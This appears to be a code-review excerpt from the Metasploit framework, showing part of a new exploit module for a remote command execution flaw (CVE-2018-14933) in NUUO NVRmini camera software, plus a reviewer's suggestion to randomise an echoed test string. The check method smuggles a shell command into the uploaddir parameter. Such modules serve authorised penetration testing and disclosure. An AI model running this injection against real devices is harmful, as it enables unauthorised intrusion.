modules/exploits/linux/http/nuuo_nvrmini_upgrade_rce.rb

```diff
@@ -0,0 +1,85 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'NUUO NVRmini - upgrade_handle.php Remote Command Execution',
+      'Description'    => %q{
+      NUUO NVRmini  ip camera web application. The upgrade_handle.php file is affected by the remote command execution vulnerability.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Berk Dusunur <@berkdusunur>',
+          'numan turle <@numanturle>'
+        ],
+      'References'     =>
+        [
+          ['URL', 'https://www.berkdusunur.net/2018/11/development-of-metasploit-module-after.html'],
+          ['CVE', '2018-14933'],
+          ['EDB','45070']
+        ],
+      'Privileged'     => false,
+      'Payload'        =>
+        {
+          'DisableNops' => true
+        },
+      'Platform'       => %w{ unix win },
+      'Arch'           => ARCH_CMD,
+      'Targets'        => [ ['NUUO NVRmini', { }], ],
+      'DisclosureDate' => 'Dec 06 2018',
+      'DefaultTarget'  => 0))
+
+  end
+
+  def check
+    res = send_request_cgi({
+      'uri'     => normalize_uri(target_uri.path.to_s, "upgrade_handle.php"),
+      'vars_get'        =>
+        {
+          'cmd' => 'writeuploaddir',
+          'uploaddir' => "';echo 'exploit_ok';'" #randomized
```

Comment:
Can `'exploit_ok'` be randomised?

```suggestion
          'uploaddir' => "';echo '#{Rex::Text.rand_text_alphanumeric(10..15)}';'"
```

Reply:
I'm updating